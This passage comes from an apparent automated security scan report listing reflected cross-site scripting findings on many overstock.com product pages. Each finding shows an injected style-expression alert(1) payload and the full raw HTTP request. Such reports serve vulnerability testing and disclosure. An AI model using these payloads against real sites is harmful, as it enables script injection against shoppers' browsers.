GET /Home-Garden/Hayden-Black-Cherry-Pub-Dining-Table-with-Leaf/3134564/product.html?6dcb9"style%3d"x%3aexpression(alert(1))"e6d508cd907=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.252. http://www.overstock.com/Home-Garden/Heavy-duty-7-piece-Nonstick-Red-Dual-tone-Cookware-Set/3286259/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e60d5"style%3d"x%3aexpression(alert(1))"e33d5b4a449 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e60d5"style="x:expression(alert(1))"e33d5b4a449 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Heavy-duty-7-piece-Nonstick-Red-Dual-tone-Cookware-Set/3286259/product.html?e60d5"style%3d"x%3aexpression(alert(1))"e33d5b4a449=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.253. http://www.overstock.com/Home-Garden/Heavyweight-500-Thread-Count-Siberian-White-Down-Comforter/3507286/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c26df"style%3d"x%3aexpression(alert(1))"51a5e59b52f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c26df"style="x:expression(alert(1))"51a5e59b52f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Heavyweight-500-Thread-Count-Siberian-White-Down-Comforter/3507286/product.html?c26df"style%3d"x%3aexpression(alert(1))"51a5e59b52f=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.254. http://www.overstock.com/Home-Garden/Hemstitch-400-Thread-Count-Sateen-Cotton-Sheet-Set/3304448/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a13ac"style%3d"x%3aexpression(alert(1))"fbbc152c544 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a13ac"style="x:expression(alert(1))"fbbc152c544 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hemstitch-400-Thread-Count-Sateen-Cotton-Sheet-Set/3304448/product.html?a13ac"style%3d"x%3aexpression(alert(1))"fbbc152c544=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.255. http://www.overstock.com/Home-Garden/High-back-Leather-Side-Chair-Set-of-2/3370060/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6fbfa"style%3d"x%3aexpression(alert(1))"e50fc1bc5dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6fbfa"style="x:expression(alert(1))"e50fc1bc5dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/High-back-Leather-Side-Chair-Set-of-2/3370060/product.html?6fbfa"style%3d"x%3aexpression(alert(1))"e50fc1bc5dc=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.256. http://www.overstock.com/Home-Garden/Hotel-8-piece-Comforter-Set/3672267/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce0ba"style%3d"x%3aexpression(alert(1))"249653dde82 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce0ba"style="x:expression(alert(1))"249653dde82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hotel-8-piece-Comforter-Set/3672267/product.html?ce0ba"style%3d"x%3aexpression(alert(1))"249653dde82=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.257. http://www.overstock.com/Home-Garden/Hotel-Collection-300-Thread-Count-Sateen-Duvet-Cover-Set/3619576/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d74a7"style%3d"x%3aexpression(alert(1))"08b3093be9b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d74a7"style="x:expression(alert(1))"08b3093be9b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hotel-Collection-300-Thread-Count-Sateen-Duvet-Cover-Set/3619576/product.html?d74a7"style%3d"x%3aexpression(alert(1))"08b3093be9b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.258. http://www.overstock.com/Home-Garden/Hotel-Collection-Therma-Plush-Blanket/5080045/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0f81"style%3d"x%3aexpression(alert(1))"fc0142d40d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d0f81"style="x:expression(alert(1))"fc0142d40d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hotel-Collection-Therma-Plush-Blanket/5080045/product.html?d0f81"style%3d"x%3aexpression(alert(1))"fc0142d40d0=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.259. http://www.overstock.com/Home-Garden/Hotel-Grand-Milano-800-Thread-Count-Hungarian-Goose-Down-Comforter/264674/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35044"style%3d"x%3aexpression(alert(1))"d6d3d6018a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 35044"style="x:expression(alert(1))"d6d3d6018a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hotel-Grand-Milano-800-Thread-Count-Hungarian-Goose-Down-Comforter/264674/product.html?35044"style%3d"x%3aexpression(alert(1))"d6d3d6018a7=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.260. http://www.overstock.com/Home-Garden/Hotel-Grand-Solid-1000-Thread-Count-Cotton-Sateen-Sheet-Set/2887469/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47510"style%3d"x%3aexpression(alert(1))"cd542eccc66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47510"style="x:expression(alert(1))"cd542eccc66 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Hotel-Grand-Solid-1000-Thread-Count-Cotton-Sateen-Sheet-Set/2887469/product.html?47510"style%3d"x%3aexpression(alert(1))"cd542eccc66=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.261. http://www.overstock.com/Home-Garden/Iron-5-light-Hanging-Chandelier/3001659/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54db9"style%3d"x%3aexpression(alert(1))"c53f47de6c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54db9"style="x:expression(alert(1))"c53f47de6c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Iron-5-light-Hanging-Chandelier/3001659/product.html?54db9"style%3d"x%3aexpression(alert(1))"c53f47de6c3=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.262. http://www.overstock.com/Home-Garden/Iron-and-Wicker-Bakers-Rack/1613542/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1189"style%3d"x%3aexpression(alert(1))"3aef0a5c49b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1189"style="x:expression(alert(1))"3aef0a5c49b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Iron-and-Wicker-Bakers-Rack/1613542/product.html?e1189"style%3d"x%3aexpression(alert(1))"3aef0a5c49b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.263. http://www.overstock.com/Home-Garden/J.K.-Adams-12-bottle-Oak-Wine-Rack/4099784/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911c8"style%3d"x%3aexpression(alert(1))"5c8b69b2e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 911c8"style="x:expression(alert(1))"5c8b69b2e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/J.K.-Adams-12-bottle-Oak-Wine-Rack/4099784/product.html?911c8"style%3d"x%3aexpression(alert(1))"5c8b69b2e1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.264. http://www.overstock.com/Home-Garden/Jaipur-Full-Queen-size-2-piece-Quilt-Set/5045117/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2838c"style%3d"x%3aexpression(alert(1))"6a0f5038201 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2838c"style="x:expression(alert(1))"6a0f5038201 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Jaipur-Full-Queen-size-2-piece-Quilt-Set/5045117/product.html?2838c"style%3d"x%3aexpression(alert(1))"6a0f5038201=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.265. http://www.overstock.com/Home-Garden/Jennings-Natural-4-foot-Swing/4072702/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ce5f"style%3d"x%3aexpression(alert(1))"48147bdc289 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3ce5f"style="x:expression(alert(1))"48147bdc289 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
